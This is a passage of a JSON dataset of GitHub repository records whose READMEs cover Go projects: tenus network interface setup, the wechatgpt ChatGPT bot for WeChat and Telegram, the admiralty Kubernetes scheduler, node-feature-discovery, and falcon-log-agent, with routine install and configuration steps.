{\n\t\tfmt.Println(err)\n\t}\n\n\tif err = veth.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// PASS VETH PEER INTERFACE TO A RUNNING DOCKER BY PID\n\tpid, err := tenus.DockerPidByName(\"vethdckr\", \"/var/run/docker.sock\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif err := veth.SetPeerLinkNsPid(pid); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// ALLOCATE AND SET IP FOR THE NEW DOCKER INTERFACE\n\tvethGuestIp, vethGuestIpNet, err := net.ParseCIDR(\"10.0.41.5/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := veth.SetPeerLinkNetInNs(pid, vethGuestIp, vethGuestIpNet, nil); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}\n```\n\n### Working with existing bridges and interfaces\n\nThe following examples show how to retrieve exisiting interfaces as a tenus link and bridge\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// RETRIEVE EXISTING BRIDGE\n\tbr, err := tenus.BridgeFromName(\"bridge0\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// REMOVING AN IP FROM A BRIDGE INTERFACE (BEFORE RECONFIGURATION)\n\tbrIp, brIpNet, err := net.ParseCIDR(\"10.0.41.1/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tif err := br.UnsetLinkIp(brIp, brIpNet); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// RETRIEVE EXISTING INTERFACE\n\tdl, err := tenus.NewLinkFrom(\"eth0\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// RENAMING AN INTERFACE BY NAME\n\tif err := tenus.RenameInterfaceByName(\"vethPSQSEl\", \"vethNEWNAME\"); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n}\n```\n\n### VLAN and MAC VLAN interfaces\n\nYou can check out [VLAN](https://gist.github.com/milosgajdos/9f68b1818dca886e9ae8) and [Mac VLAN](https://gist.github.com/milosgajdos/296fb90d076f259a5b0a) examples, too.\n\n### More examples\n\nRepo contains few more code sample in ```examples``` folder so make sure to check them out if you're interested.\n\n## TODO\n\nThis is just a rough beginning of the project which I put together over couple of weeks in my free time. I'd like to integrate this into my own Docker fork and test the advanced netowrking functionality with the core of Docker as oppose to configuring network interfaces from a separate golang program, because advanced networking in Docker was the main motivation for writing this package.\n\n## Documentation\n\nMore in depth package documentation is available via [godoc](http://godoc.org/github.com/milosgajdos/tenus)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "houko/wechatgpt", "link": "https://github.com/houko/wechatgpt", "tags": ["chatgpt", "wechat", "slack", "golang"], "stars": 537, "description": "wechatgpt golang\u7248 chatgpt\u673a\u5668\u4eba(\u53efdocker\u90e8\u7f72)\uff0c\u76ee\u524d\u652f\u6301wechat\uff0ctelegram", "lang": "Go", "repo_lang": "", "readme": "## \u6b22\u8fce\u4f7f\u7528`wechatgpt`\u667a\u80fd\u673a\u5668\u4eba\uff0cLet's Chat with ChatGPT\n\n\u5982\u679c\u89c9\u5f97\u4e0d\u9519\uff0c\u8bf7\u9ebb\u70e6\u70b9\u4e2a`Star`\uff0c\u975e\u5e38\u611f\u8c22\u3002\uff08\u6700\u65b0\u5df1\u7ecf\u6dfb\u52a0\u4e86docker\u90e8\u7f72\u7684\u65b9\u5f0f\uff09\n\n

\n\"Version\"\n \n \"License:\n \n \n \"Twitter:\n \n

\n\n## \u4ed3\u5e93\u5730\u5740\n\nhttps://github.com/houko/wechatgpt\n\n## \u51c6\u5907\u8fd0\u884c\u73af\u5883\n\n```\ngo mod tidy \ncp config/config.yaml.example local/config.yaml\n```\n\n## \u4fee\u6539\u4f60\u7684token\n\n\u6253\u5f00 [openai](https://beta.openai.com/account/api-keys) \u5e76\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7,\n\u751f\u6210\u4e00\u4e2aapi_key\u5e76\u628aapi_key\u653e\u5230`local/config.yaml`\n\u7684token\u4e0b\uff0c\u8bf7\u770b\u5982\u4e0b\u793a\u4f8b(\u8bf4\u4e86\u662f\u793a\u4f8b\u522b\u8bd5\u4e86,\u5185\u5bb9\u4e71\u5199\u7684\uff0c\u4e5f\u611f\u8c22@\u90a3\u4e9b\u62c5\u5fc3\u6cc4\u6f0fkey\u7684)\uff1a\n\n```\nchatgpt:\n wechat: \u5c0f\u83ab\n token: sk-pKHZD1fLYqXDjjsdsdsdUvIODTT3ssjdfadsJC2gTuqqhTum\n telegram: your telegram token\n```\n\n\u5927\u9646\u7528\u6237\u6ce8\u518c`openai`\u8bf7\u53c2\u8003 [\u6ce8\u518cChatGPT\u8be6\u7ec6\u6307\u5357](https://sms-activate.org/cn/info/ChatGPT)\n\n## \u8fd0\u884cApp\n\n### \u73af\u5883\u53d8\u91cf\n\n| \u53d8\u91cf\u540d | \u503c | \u4f5c\u7528 |\n|----------------|-------------------|------------------|\n| api_key | \"chatgpt\u7684api_key\" | \u5fc5\u586b\u9879 |\n| wechat | \"true\" \u6216\u7f3a\u7701 | \u5982\u679c\u4e3atrue\u5c31\u4f1a\u542f\u52a8\u5fae\u4fe1\u673a\u5668\u4eba |\n| wechat_keyword | \"\u5173\u952e\u5b57\"\u6216\u7f3a\u7701 | \u5982\u679c\u7f3a\u7701\u5219\u53d1\u4efb\u4f55\u6d88\u606f\u673a\u5668\u90fd\u4f1a\u56de\u590d |\n| telegram | telegram\u7684token\u6216\u7f3a\u7701 | \u5982\u679c\u8981\u542f\u52a8tg\u673a\u5668\u4eba\u9700\u8981\u586b\u5199 |\n| tg_keyword | telegram\u89e6\u53d1\u5173\u952e\u5b57\u6216\u7f3a\u7701 | \u5982\u679c\u9700\u8981\u5173\u952e\u5b57\u89e6\u53d1\u5c31\u586b\u5199 |\n| tg_whitelist | telegram\u7684\u89e6\u53d1\u767d\u540d\u5355 | \u767d\u540d\u5355\u4ee5\u5916\u7684\u7528\u6237\u540d\u53d1\u6d88\u606f\u4e0d\u4f1a\u89e6\u53d1 |\n\n```\ngo run main.go\n```\n\n## `Docker` \u65b9\u5f0f\u8fd0\u884c`wechatgpt`\n\n\u8fd0\u884c\u5fae\u4fe1\u667a\u80fd\u673a\u5668\u4eba\u7684\u8bdd\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\uff0c\u5fae\u4fe1\u767b\u9646\u7684\u5730\u5740\u8bf7\u67e5\u770b\u8fd0\u884c\u65e5\u5fd7`docker logs `\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e wechat=\"true\" \\\n-e wechat_keyword=\"\u5fae\u4fe1\u89e6\u53d1\u5173\u952e\u5b57\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u8fd0\u884c\u5fae\u4fe1\u667a\u80fd\u673a\u5668\u4eba\u4e0d\u9700\u8981\u4efb\u4f55\u89e6\u53d1\u5173\u952e\u5b57\u8bf7\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\uff0c\u9002\u5408\u5fae\u4fe1\u5c0f\u53f7\u4e13\u4e1a\u505a\u673a\u5668\u4eba\u7528\uff0c\u5fae\u4fe1\u767b\u9646\u7684\u5730\u5740\u8bf7\u67e5\u770b\u8fd0\u884c\u65e5\u5fd7`docker logs ` \n`\u8b66\u544a\uff1a\u4ee5\u4e0b\u547d\u4ee4\u4f1a\u8ba9\u4efb\u4f55\u6d88\u606f\u90fd\u4f1a\u88ab\u673a\u5668\u4eba\u63a5\u7ba1\uff0c\u5fae\u4fe1\u4e3b\u53f7\u4e0d\u8981\u7528\u4e0b\u9762\u8fd9\u4e2a\u547d\u4ee4`\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e wechat=\"true\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u7684\u8bdd\u8fd0\u884c\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u5982\u679c\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u65f6\u53ea\u5e0c\u671b\u6307\u5b9a\u7684\u4eba\u4f7f\u7528\uff0c\u767d\u540d\u5355\u4ee5\u5916\u7684\u4eba\u53d1\u6d88\u606f\u673a\u5668\u4eba\u4e0d\u4f1a\u56de\u590d\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" \\\n-e tg_whitelist=\"username1,username2\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\u5982\u679c\u8fd0\u884c`telegram`\u667a\u80fd\u673a\u5668\u4eba\u65f6\u5e0c\u671b\u5728\u7fa4\u91cc\u56de\u590d\u522b\u4eba\u6d88\u606f\uff0c\u53ef\u4ee5\u6307\u5b9a\u4e00\u4e2a\u5173\u952e\u5b57\u89e6\u53d1\n\n```\ndocker run -d \\\n--name wechatgpt \\\n-e api_key=\"\u4f60\u7684chatgpt api_key\" \\\n-e telegram=\"\u4f60\u7684telegram token\" \\\n-e tg_keyword=\"\u5c0f\u83ab\" \\\nxiaomoinfo/wechatgpt:latest\n\n```\n\n\"drawing\"\n\n### \u5fae\u4fe1\n\n```\nain.go #gosetup\ngo: downloading github.com/eatmoreapple/openwechat v1.2.1\ngo: downloading github.com/sirupsen/logrus v1.6.0\ngo: downloading github.com/spf13/afero v1.9.2\ngo: downloading github.com/pelletier/go-toml/v2 v2.0.5\ngo: downloading golang.org/x/sys v0.0.0-20220908164124-27713097b956\n/private/var/folders/8t/0nvj_2kn4dl517vhbc4rmb9h0000gn/T/GoLand/___go_build_main_go\n\u8bbf\u95ee\u4e0b\u9762\u7f51\u5740\u626b\u63cf\u4e8c\u7ef4\u7801\u767b\u5f55\nhttps://login.weixin.qq.com/qrcode/QedkOe1I4w==\n```\n\n\u4f1a\u81ea\u52a8\u6253\u5f00\u9ed8\u8ba4\u6d4f\u89c8\u5668\uff0c\u5982\u679c\u6ca1\u6709\u6253\u5f00\u4e5f\u53ef\u4ee5\u624b\u52a8\u70b9\u51fb\u4e0a\u9762\u7684\u94fe\u63a5\u6253\u5f00\u4e8c\u7ef4\u7801\u626b\u5fae\u4fe1\n\n```\n2022/12/09 15:15:00 \u767b\u5f55\u6210\u529f\n2022/12/09 15:15:01 RetCode:0 Selector:2\n2022/12/09 15:15:04 RetCode:0 Selector:2\nINFO[0099] 0 \nINFO[0099] 1 \nINFO[0099] 2 \nINFO[0099] 3 \n```\n\n\u767b\u9646\u6210\u529f\u540e\u4f1a\u62c9\u53d6\u5fae\u4fe1\u7684\u597d\u53cb\u548c\u7fa4\u7ec4\n\n### \u5982\u4f55\u4f7f\u7528\n\n\u9ed8\u8ba4\u4e3a`chatgpt`\uff0c\u5982\u679c\u60f3\u8bbe\u7f6e\u5176\u4ed6\u7684\u89e6\u53d1\u65b9\u5f0f\u53ef\u4ee5\u4fee\u6539`local/config.yaml`\u7684wechat\u3002\u6b64\u65f6\uff0c\u5982\u679c\u522b\u4eba\u7ed9\u4f60\u53d1\u6d88\u606f\u5e26\u6709\u5173\u952e\u5b57`chatgpt`\n\uff0c\u4f60\u7684\u5fae\u4fe1\u5c31\u4f1a\u8c03\u7528`chatGPT`AI\u81ea\u52a8\u56de\u590d\u4f60\u7684\u597d\u53cb\u3002\n\u5f53\u7136\uff0c\u5728\u7fa4\u91cc\u4e5f\u662f\u53ef\u4ee5\u7684\u3002\n\n### \u4f7f\u7528\u573a\u666f1\n\n\u522b\u4eba\u7ed9\u4f60\u53d1\u6d88\u606f\u65f6\uff0c\u5982\u679c\u6d88\u606f\u4e2d\u5e26\u6709\u5173\u952e\u5b57\uff0c\u7cfb\u7edf\u5c31\u4f1a\u8c03\u7528AI\u81ea\u52a8\u5e2e\u4f60\u56de\u590d\u6b64\u95ee\u9898\u3002\n\n\"drawing\"\"drawing\"\"drawing\"\n\n### \u4f7f\u7528\u573a\u666f2\n\n\u81ea\u5df1\u7ed9\u81ea\u5df1\u53d1\u6d88\u606f\u65f6\uff0c\u5982\u679c\u6d88\u606f\u4e2d\u5e26\u6709\u5173\u952e\u5b57\uff0c\u7cfb\u7edf\u4f1a\u4e5f\u8c03\u7528AI\u81ea\u52a8\u5e2e\u4f60\u56de\u590d\u6b64\u95ee\u9898\u3002\n\n\"drawing\"\n\n### \u610f\u5916\u4e4b\u559c\n\n\"drawing\" \n\n\u8fd9\u4e0d\u6bd4\u5bf9\u8c61\u6765\u7684\u8d34\u5fc3\uff1f\n\n### telegram\u673a\u5668\u4eba\u4f7f\u7528\u65b9\u5f0f \n \u4fee\u6539 config\u4e0b\u7684 `chatgpt.telegram`\u7684token\u540e\u8fd0\u884c`go run main.go`\u8fdb\u884c\u542f\u52a8\uff0c\u53c2\u8003\u5982\u4e0b\uff1a\n\n```\nchatgpt:\n wechat: \u5c0f\u83ab\n token: sk-pKHZD1fLYyd56sadsdUvIODTT3ssjdfadsJC2gTuqqhTum\n telegram: 5718911250:AAhRdbdfxzcCFoM_GyI2g9B18S7WbYviQ \n```\n\n`token`\u83b7\u53d6\u65b9\u5f0f\uff0c\u8bf7\u5728telegram\u4e2d\u6dfb\u52a0\u597d\u53cb`@botFather`\u5e76\u6309\u63d0\u793a\u64cd\u4f5c\n\n\"drawing\"\n\n## \u603b\u7ed3\n\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4f60\u7684\u667a\u80fd\u52a9\u7406\uff0c\u5e2e\u52a9\u4f60\u5feb\u901f\u56de\u590d\u6d88\u606f\u3002\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4e00\u4e2a\u667a\u80fd\u673a\u5668\u4eba\uff0c\u9080\u8bf7\u5728\u7fa4\u91cc\u4e4b\u540e\u901a\u8fc7\u5173\u952e\u5b57\u5e2e\u52a9\u5927\u5bb6\u89e3\u7b54\u95ee\u9898\u3002\n- \u4f60\u53ef\u4ee5\u628a\u5b83\u5f53\u4f5c\u4f60\u7684\u667a\u591a\u661f\uff0c\u6709\u4ec0\u4e48\u95ee\u9898\u4e0d\u61c2\u7684\u65f6\u5019\u968f\u65f6\u95ee\u5b83\u3002\n\n## \u53d8\u7238\u7238\u4e8b\u4ef6\n\n\u653e\u5728B\u7ad9\n[\u7528chatgpt\u5199\u4e86\u4e2a\u5fae\u4fe1\u673a\u5668\u4eba\u7ed3\u679c\u53d8\u7238\u7238\u4e86](https://www.bilibili.com/video/BV1B24y1Q7us/)\n\n## \u8d21\u732e\u672c\u4ed3\u5e93\n\n\u5982\u679c\u5927\u5bb6\u6709\u73a9\u7684\u65f6\u5019\u6709\u9047\u5230\u4e00\u4e9b\u5947\u602a\u7684\u5bf9\u8bdd\u53ef\u4ee5\u622a\u56fe\u53d1PR\u5206\u4eab\u7ed9\u5927\u5bb6\u3002\u53e6\u5916\u5bf9\u672c\u9879\u76ee\u6709\u4ec0\u4e48\u60f3\u6cd5\u6216\u8005\u8d21\u732e\u7684\u8bdd\u6b22\u8fce\u63d0[issue](https://github.com/houko/wechatgpt/issues)\n\u6216[pr](https://github.com/houko/wechatgpt/pulls)\n\n## Q&A\n\n### 1. \u8fd4\u56de\u9519\u8bef`invalid_api_key`\n\n\u8fd9\u662f\u56e0\u4e3a`openai`\u7684`API`\n\u9700\u8981\u4ed8\u8d39\uff0c\u4ef7\u683c\u975e\u5e38\u4fbf\u5b9c\u5177\u4f53\u53ef\u4ee5\u5b98\u7f51\u67e5\u770b\u3002\u6309\u7167\u5982\u4e0b\u53c2\u8003\u7ed1\u5b9a\u4e00\u4e0b\u4fe1\u606f\u5361\u5c31\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\u4e86\uff0c\u5982\u679c\u8fd8\u662f\u6709\u9519\u5c31\u628a`API Key`\u5220\u6389\u91cd\u65b0\u5efa\u4e00\u4e2a\u3002\n![img.png](screenshots/billing.png)\n\n### 2. Cannot load io/fs: malformed module path \"io/fs\": missing dot in first path element\n\ngolang\u7248\u672c\u592a\u4f4e\uff0c\u9700\u8981`1.16`\u4ee5\u4e0a\uff0c\u67e5\u770b\u65b9\u5f0f\u4e3a`go version`\n\n```\n$ go version\ngo version go1.17.3 linux/amd64\n```\n\n### 3. \u626b\u7801\u767b\u9646\u65f6\u51fa\u73b0\u9519\u8bef FATA\u30100023\u3011write token.json: bad file descriptor\n\n\u5220\u9664\u9879\u76ee\u6839\u76ee\u5f55\u4e0b\u7684`token.json`\u540e\u91cd\u65b0\u626b\u7801\u767b\u9646\u5373\u53ef\n\n### 4. go mod tidy\u65f6connect: connection refused\n\n```\ngo: github.com/eatmoreapple/openwechat@v1.2.1: Get https://proxy.golang.org/github.com/eatmoreapple/openwechat/@v/v1.2.1.mod: dial tcp 142.251.43.17:443:\n```\n\n\u81ea\u8eab\u7f51\u7edc\u73af\u5883\u95ee\u9898\uff0c\u8bf7\u6392\u67e5\u7f51\u7edc\u8bbe\u7f6e\n\n## \u534f\u8bae\n\n[MIT LICENSE](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "admiraltyio/admiralty", "link": "https://github.com/admiraltyio/admiralty", "tags": [], "stars": 536, "description": "A system of Kubernetes controllers that intelligently schedules workloads across clusters.", "lang": "Go", "repo_lang": "", "readme": "# Admiralty\n\n_formerly multicluster-scheduler_\n\nAdmiralty is a system of Kubernetes controllers that intelligently schedules workloads across clusters. It is simple to use and simple to integrate with other tools.\n\nThe documentation hosted at https://admiralty.io/docs/ is sourced from this repository. The links below point to the local Markdown files. Use them if you're browsing this repo without Internet access; otherwise, **the [hosted version](https://admiralty.io/docs/) is easier to navigate**.\n\n- [Introduction](docs/introduction.md)\n- [Quick Start](docs/quick_start.md)\n- Concepts\n - [Multi-Cluster Topologies](docs/concepts/topologies.md)\n - [Cross-Cluster Authentication](docs/concepts/authentication.md)\n - [Multi-Cluster Scheduling](docs/concepts/scheduling.md)\n- Operator Guide\n - [Installation](docs/operator_guide/installation.md)\n - [Configuring Authentication](docs/operator_guide/authentication.md)\n - [Configuring Scheduling](docs/operator_guide/scheduling.md)\n- [Contributor Guide](CONTRIBUTING.md)\n- [Release Notes](CHANGELOG.md)\n- API Reference\n - [Helm Chart](charts/multicluster-scheduler/README.md)\n- [License](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/node-feature-discovery", "link": "https://github.com/kubernetes-sigs/node-feature-discovery", "tags": ["kubernetes", "hardware", "feature-detection", "node-labels", "cpuid", "rdt", "k8s-sig-node", "hacktoberfest"], "stars": 537, "description": "Node feature discovery for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Node Feature Discovery\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/kubernetes-sigs/node-feature-discovery)](https://goreportcard.com/report/github.com/kubernetes-sigs/node-feature-discovery)\n[![Prow Build](https://prow.k8s.io/badge.svg?jobs=post-node-feature-discovery-push-images)](https://prow.k8s.io/job-history/gs/kubernetes-jenkins/logs/post-node-feature-discovery-push-images)\n[![Prow E2E-Test](https://prow.k8s.io/badge.svg?jobs=postsubmit-node-feature-discovery-e2e-test)](https://prow.k8s.io/job-history/gs/kubernetes-jenkins/logs/postsubmit-node-feature-discovery-e2e-test)\n\nWelcome to Node Feature Discovery \u2013 a Kubernetes add-on for detecting hardware\nfeatures and system configuration!\n\n### See our [Documentation][documentation] for detailed instructions and reference\n\n#### Quick-start \u2013 the short-short version\n\n```bash\n$ kubectl apply -k https://github.com/kubernetes-sigs/node-feature-discovery/deployment/overlays/default?ref=v0.12.1\n namespace/node-feature-discovery created\n customresourcedefinition.apiextensions.k8s.io/nodefeaturerules.nfd.k8s-sigs.io created\n serviceaccount/nfd-master created\n clusterrole.rbac.authorization.k8s.io/nfd-master created\n clusterrolebinding.rbac.authorization.k8s.io/nfd-master created\n configmap/nfd-worker-conf created\n service/nfd-master created\n deployment.apps/nfd-master created\n daemonset.apps/nfd-worker created\n\n$ kubectl -n node-feature-discovery get all\n NAME READY STATUS RESTARTS AGE\n pod/nfd-master-555458dbbc-sxg6w 1/1 Running 0 56s\n pod/nfd-worker-mjg9f 1/1 Running 0 17s\n...\n\n$ kubectl get no -o json | jq .items[].metadata.labels\n {\n \"kubernetes.io/arch\": \"amd64\",\n \"kubernetes.io/os\": \"linux\",\n \"feature.node.kubernetes.io/cpu-cpuid.ADX\": \"true\",\n \"feature.node.kubernetes.io/cpu-cpuid.AESNI\": \"true\",\n...\n\n```\n\n[documentation]: https://kubernetes-sigs.github.io/node-feature-discovery\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "didi/falcon-log-agent", "link": "https://github.com/didi/falcon-log-agent", "tags": [], "stars": 536, "description": "\u7528\u4e8e\u76d1\u63a7\u7cfb\u7edf\u7684\u65e5\u5fd7\u91c7\u96c6agent\uff0c\u53ef\u65e0\u7f1d\u5bf9\u63a5open-falcon", "lang": "Go", "repo_lang": "", "readme": "# falcon-log-agent \n\n![log-agent](./pic/logo.png)\n\n[![Build Status](https://img.shields.io/github/stars/didi/falcon-log-agent.svg)](https://github.com/didi/falcon-log-agent)\n[![Build Status](https://img.shields.io/github/forks/didi/falcon-log-agent.svg)](https://github.com/didi/falcon-log-agent)\n[![Build Status](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/didi/falcon-log-agent)\n[![Backers on Open Collective](https://opencollective.com/falcon-log-agent/backers/badge.svg)](#backers) \n[![Sponsors on Open Collective](https://opencollective.com/falcon-log-agent/sponsors/badge.svg)](#sponsors) \n\n# \u76ee\u5f55\n- [\u7b80\u4ecb](#\u7b80\u4ecb)\n- [Feature](#Feature)\n- [\u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6](#\u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6)\n- [falcon-log-agent\u5982\u4f55\u5de5\u4f5c](#falcon-log-agent\u5982\u4f55\u5de5\u4f5c)\n- [\u9650\u5b9a\u6761\u4ef6](#\u9650\u5b9a\u6761\u4ef6)\n- [\u5f00\u59cb\u4f7f\u7528log-agent](#\u5f00\u59cb\u4f7f\u7528log-agent)\n * [\u6784\u5efa](#)\n * [\u4fee\u6539\u914d\u7f6e\u6587\u4ef6](#)\n * [\u542f\u52a8/\u505c\u6b62\u670d\u52a1](#)\n- [\u57fa\u7840\u914d\u7f6e\u9879](#\u57fa\u7840\u914d\u7f6e\u9879)\n * [\u65e5\u5fd7\u76f8\u5173](#)\n * [worker\u76f8\u5173](#)\n * [\u8d44\u6e90\u9650\u5236](#)\n * [\u7b56\u7565\u76f8\u5173](#)\n * [\u5176\u4ed6](#)\n- [\u91c7\u96c6\u7b56\u7565](#\u91c7\u96c6\u7b56\u7565)\n * [\u6587\u4ef6\u8def\u5f84](#\u6587\u4ef6\u8def\u5f84)\n * [\u65f6\u95f4\u683c\u5f0f](#\u65f6\u95f4\u683c\u5f0f)\n * [\u91c7\u96c6\u89c4\u5219](#\u91c7\u96c6\u89c4\u5219)\n * [\u91c7\u96c6\u5468\u671f](#\u91c7\u96c6\u5468\u671f)\n * [\u91c7\u96c6\u65b9\u5f0f](#\u91c7\u96c6\u65b9\u5f0f)\n * [\u91c7\u96c6\u540d\u79f0](#\u91c7\u96c6\u540d\u79f0)\n * [\u6807\u7b7e](#\u6807\u7b7e)\n * [\u5176\u4ed6](#\u5176\u4ed6)\n- [\u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f](#\u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f)\n- [\u81ea\u8eab\u72b6\u6001\u66b4\u9732](#\u81ea\u8eab\u72b6\u6001\u66b4\u9732)\n- [\u81ea\u76d1\u63a7](#\u81ea\u76d1\u63a7)\n\n# \u7b80\u4ecb\nfalcon-log-agent\u662f\u4e00\u4e2a\u5f00\u6e90\u7248\u7684\u65e5\u5fd7\u91c7\u96c6\u5de5\u5177\uff0c\u65e8\u5728\u4ece\u6d41\u5f0f\u7684\u65e5\u5fd7\u4e2d\u6293\u53d6\u3001\u7edf\u8ba1\u65e5\u5fd7\u4e2d\u7684\u7279\u5f81\u4fe1\u606f\u3002\n\n\u83b7\u53d6\u7684\u7279\u5f81\u4fe1\u606f\uff0c\u4e0e\u5f00\u6e90\u7248Open-Falcon\u76d1\u63a7\u7cfb\u7edf\u6253\u901a\u3002\u53ef\u7528\u4e8e\u4e1a\u52a1\u6307\u6807\u7684\u8861\u91cf\u3001\u4e5f\u53ef\u7528\u4e8e\u7a33\u5b9a\u6027\u7684\u5efa\u8bbe\u3002\n\n# Feature\n- **\u51c6\u786e\u53ef\u4f9d\u8d56**\uff1a\u5386\u7ecf\u6ef4\u6ef4\u7ebf\u4e0a\u4e1a\u52a1\u8fd1\u4e00\u5e74\u8003\u9a8c\uff0c\u7edf\u8ba1\u51c6\u786e\u6027\u9ad8\u3002\n- **\u6027\u80fd\u9ad8\u3001\u8d44\u6e90\u6d88\u8017\u53ef\u63a7**\uff1a\u6027\u80fd\u4f18\u5316\u7a0b\u5ea6\u9ad8\uff0c\u5355\u6838\u5355\u7b56\u7565\u53ef\u652f\u6491\u65e5\u5fd7\u5206\u6790:20W\u6761/\u79d2\n- **\u63a5\u5165\u6210\u672c\u4f4e**\uff1a\u5916\u6302\u5f0f\u91c7\u96c6\uff0c\u53ea\u9700\u8981\u6807\u51c6\u5316\u65e5\u5fd7\u5373\u53ef\uff1b\u8f93\u51fa\u6570\u636e\u76f4\u63a5\u5bf9\u63a5open-falcon\u3002\n\n\u9644\uff1a\u6211\u53f8agent\u5347\u7ea7\u524d\u540e\u8d44\u6e90\u5360\u7528\u5bf9\u6bd4\u56fe\n![\u8d44\u6e90\u5bf9\u6bd4\u56fe](./pic/resource.png)\n\n\n# \u4ec0\u4e48\u662f\u65e5\u5fd7\u91c7\u96c6\n\u65e5\u5fd7\u91c7\u96c6\uff0c\u662f\u4e00\u79cd\u5916\u6302\u5f0f\u7684\u91c7\u96c6\u3002\u901a\u8fc7\u8bfb\u53d6\u8fdb\u7a0b\u6253\u5370\u7684\u65e5\u5fd7\uff0c\u6765\u8fdb\u884c\u76d1\u63a7\u6570\u636e\u7684\u91c7\u96c6\u4e0e\u6c47\u805a\u8ba1\u7b97\u3002\n\n# falcon-log-agent\u5982\u4f55\u5de5\u4f5c\n\u672cagent\u5373\u65e5\u5fd7\u91c7\u96c6\u573a\u666f\u4e0b\u7684\u5b9e\u65f6\u8ba1\u7b97\u3002\u5b9e\u65f6\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\uff0c\u5b9e\u65f6\u8ba1\u7b97\uff0c\u5c06\u8ba1\u7b97\u7ed3\u679c\u76f4\u63a5\u63a8\u9001\u81f3falcon\u3002\n\n# \u9650\u5b9a\u6761\u4ef6\n- **\u8981\u6c42\u65e5\u5fd7\u5fc5\u987b\u5305\u542b\u65f6\u95f4**\uff1a\u4e0d\u5305\u542b\u65f6\u95f4\u7684\u65e5\u5fd7\uff0c\u53ea\u80fd\u6839\u636e\u5f53\u524d\u65f6\u95f4\u7edf\u8ba1\u65e5\u5fd7\u6761\u6570\uff0c\u7ed3\u679c\u975e\u5e38\u4e0d\u51c6\u786e\u3002\n- **\u4e0d\u652f\u6301\u6587\u4ef6\u8f6f\u94fe**\n- **\u65e5\u5fd7\u65f6\u95f4\u5fc5\u987b\u6709\u5e8f**\uff1a\u4e3a\u4e86\u5e94\u5bf9\u65e5\u5fd7\u5ef6\u8fdf\u843d\u76d8\u7b49\uff0cagent\u4f1a\u6839\u636e\u65e5\u5fd7\u7684\u65f6\u95f4\u6765\u5224\u65ad\u67d0\u4e00\u5468\u671f\u7684\u6570\u636e\u662f\u5426\u91c7\u96c6\u5b8c\u6210\uff0c\u5982\u679c\u65e5\u5fd7\u65f6\u95f4\u987a\u5e8f\u9519\u4e71\uff0c\u53ef\u80fd\u5bfc\u81f4\u91c7\u96c6\u4e0d\u51c6\u3002\n\n# \u5f00\u59cb\u4f7f\u7528log-agent\n\n**\u6784\u5efa**\n```\ngo get https://github.com/didi/falcon-log-agent.git && cd $GOPATH:/src/github.com/didi/falcon-log-agent\nmake build\n```\n\n**\u4fee\u6539\u914d\u7f6e\u6587\u4ef6**\n```\n# base config\ncp cfg/dev.cfg cfg/cfg.json\nvim cfg/cfg.json\n\n# strategy config\ncp cfg/strategy.dev.json cfg/strategy.json\nvim cfg/strategy.json\n```\n\n**\u6253\u5305 & \u5b89\u88c5**\n```\nmake pack\nexport WorkDir=\"$HOME/falcon-log-agent\"\nmkdir -p $WorkDir\ntar -xzvf falcon-log-agent.tar.gz -C $WorkDir\ncd $WorkDir\n```\n\n\n**\u542f\u52a8/\u505c\u6b62\u670d\u52a1**\n```\n # start\n./control start\n\n# stop\n./control stop\n\n# status\n./control status\n```\n\n# 